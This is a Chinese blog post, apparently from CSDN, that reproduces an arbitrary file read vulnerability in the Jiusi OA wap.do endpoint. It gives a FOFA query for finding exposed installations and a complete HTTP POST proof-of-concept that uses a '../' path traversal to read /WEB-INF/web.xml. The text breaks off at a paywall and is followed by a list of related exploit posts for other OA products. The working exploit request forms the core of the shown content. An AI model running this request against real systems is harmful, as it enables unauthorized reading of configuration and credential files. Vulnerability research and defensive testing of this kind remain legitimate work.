九思OA wap.do 任意文件读取漏洞复现

最新推荐文章于 2025-02-23 16:08:32 发布
最新推荐文章于 2025-02-23 16:08:32 发布
阅读量1.9k 收藏 8
点赞数 12
分类专栏: 漏洞复现v1 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135123965
版权

0x01 产品简介

九思OA系统是安装、实施、学习、操作、维护的OA系统,由北京九思协同软件有限公司开发。

0x02 漏洞概述

北京九思协同办公软件wap.do接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 复现环境

FOFA:app="九思软件-OA"

0x04 漏洞复现

PoC

POST /jsoa/wap.do?method=downLoad HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

path=../&name=&FileName=/WEB-INF/web.xml</
了解本专栏 订阅专栏 解锁全文 超级会员免费看
OA wap.do接口任意文件读取漏洞复现 [附POC]
薛定谔嘚喵博客
12-25 712
协同办公软件wap.do接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等。
OA软件user_list_3g.jsp存在SQL注入漏洞
李火火的安全圈
02-28 871
软件为中国高端OA系统知名品牌,OA软件`user_list_3g.jsp`存在SQL注入漏洞
#渗透测试#批量漏洞挖掘#OA系列漏洞之SQL注入漏洞(CNVD-2023-23771)
soc的博客
02-23 974
OA办公自动化系统平台基于开发JAVA语言开发。
复现OA系统 SQL注入漏洞_43
fushuang333的博客
02-08 1804
复现OA系统 SQL注入漏洞,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
漏洞复现】|OA_dl.jsp任意文件读取
摘星怪sec的blog
11-19 325
OA产品由北京协同软件有限公司(简称软件)开发,面向企事业单位和政府机关,致力于提供高端的协同办公解决方案,帮助客户实现信息化、数字化和智能化转型。通过融合多种管理想与OA接口技术,OA帮助企业打破管理边界、整合信息孤岛,形成高效、规范、实时且低成本的管理环境,支持一体化的技术架构。该系统的dl.jsp接口存在任意文件读取漏洞,攻击者可通过该漏洞读取系统的重要文件(如数据库配置文件、系统配置文件等),导致网站安全性严重受损,暴露于更高的攻击风险。
西软云XMS getresponseasync XXE漏洞复现
0xSec
04-17 750
西软云XMSgetresponseasync 接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。
OA XXE漏洞复现
iSee857的博客
08-23 829
OA /jsoa/WebServiceProxy 接口处存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,调用外部非可信源实体。关闭互联网暴露面或接口设置访问权限。
漏洞复现OA-wap-任意文件读取
知黑而守白
01-15 359
OA办公软件全面实现协同工作、公文、流程审批、知识管理、项目管理、综合办公、信息共享、移动办公 等应用功能,并能够与其他异构系统整合,打破信息孤岛,建立完整的有效的企业工作平台和移动办公软件。OA协同办公系统 wap 接口存在文件读取漏洞。攻击者可以通过恶意构造的请求读取服务器上的任意文件,包括敏感的系统文件。此漏洞可能导致泄露敏感信息,为攻击者提供足够的信息来进一步渗透系统。
OA-wap-任意文件读取(含批量验证poc)
weixin_43567873的博客
04-09 169
OA-wap-任意文件读取(含批量验证poc)
OA user_list_3g.jsp SQL注入漏洞复现
0xSec
02-02 583
北京协同办公软件user_list_3g.jsp接口处存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现OA user_list_3g.jsp 存在SQL注入漏洞
KKleeeaa的博客
02-06 513
声明:亲爱的读者,我们诚挚地提醒您,Aniya网络安全的技术文章仅供个人研究学习参考。任何因传播或利用本实验室提供的信息而造成的直接或间接后果及损失,均由使用者自行承担责任。Aniya网络安全及作者对此概不负责。如有侵权,请立即告知,我们将立即删除并致歉。OA中的user_list_3g.jsp接口处存在SQL注入漏洞,攻击者可通过此漏洞进一步渗透,甚至获取管理员账户密码。用户输入的参数进行限制。增加WAF,设置白名单。0x02FOFA语句。
漏洞复现OA dl任意文件读取漏洞
m0_46381222的博客
11-22 750
漏洞复现OA dl任意文件读取漏洞
SRM智联云采系统quickReceiptDetail存在SQL注入漏洞
缘梦未来的博客
11-22 196
智联云采SRM重构供应链 采购更简单 针对企业供应链采购管理难题及数字化转型需求,智联云采依托人工智能、物联网、大数据、云等前沿技术,沉淀产品系统化方案,帮助企业实现战略寻源更具预测性。
漏洞复现OA-user-list-3g-sql注入
知黑而守白
02-02 408
OA办公软件全面实现协同工作、公文、流程审批、知识管理、项目管理、综合办公、信息共享、移动办公 等应用功能,并能够与其他异构系统整合,打破信息孤岛,建立完整的有效的企业工作平台和移动办公软件。OA协同办公系统 user_list_3g 接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
OA dl.jsp 任意文件读取漏洞复现
0xSec
11-14 875
北京协同办公软件dl.jsp接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
记一次在梦中对某oa系统的漏洞挖掘
weixin_40418457的博客
11-11 3073
0X01正文 打开网站…… 先用7kb扫一波目录。 哦吼,发现了一堆的目录遍历(绿色的都是) 这里一个 Log目录十分的显眼,很有可能造成log泄露。 okey,如我所料 收获了一个通用中危洞 √ 27450-kwvsjna88f.png 同时我找到了代表用户名的dlm 接下来,我就从日志文件中收集了一波泄露用户名,然后爆破它 好了,弱口令数量+1 挖洞不是有手就行吗 接着来,登入后台后,我们点开更改头像。 这个oa系统,文件上传地方仅在前端效验后缀,轻松可以绕过。 然后直接连接上菜刀就好
[zkaq靶场]命令执行--IBOS协同办公系统通杀漏洞
wwxxee
05-11 2054
命令执行 命令执行相关函数 system() 能够将字符串作为OS命令执行,自带输出功能。 exec() 将字符串作为OS命令执行,需要输出 shell_exec() 将字符串作为OS命令执行,需要输出 passthru() 能够将字符串作为OS命令执行,自带输出 popen() 将字符串作为OS命令执行,但是该函数返回一个文件指针。 反引号`` 反引号内的字符串也会被解析成OS命令。 靶场 本地测试 本期主角:ibos(一款协同办公系统) 版本:4.5.5 安装: 安装完成之后
漏洞复现】​金蝶云星空管理中心
hackzkaq的博客
11-05 776
金蝶云星空是一款基于领先的可组装低代码PaaS平台,全面服务客户研发、生产、营销、供应链、财务等领域转型的企业管理服务平台。它已支持IPD、精益、阿米巴等先进管理理念在3.1万余家客户实践,一起助力企业“产品力、获客力、交付力、口碑力”。该漏洞存在于ScpSupRegHandler接口下,服务器对用户输入的数据没有进行严格的过滤,攻击者可以利用该漏洞获取服务器管理权限。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。免费领取安全学习资料包!
oa漏洞复现
最新发布
03-11
#### OA dl.jsp任意文件读取漏洞 最后提到的是OA dl.jsp组件所携带的另一个形式相近却有所区别的任意外部实体加载隐患。这里同样依赖于对下载链接格式的研究来定位潜在入口点。发送带有特殊字符组合构成的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值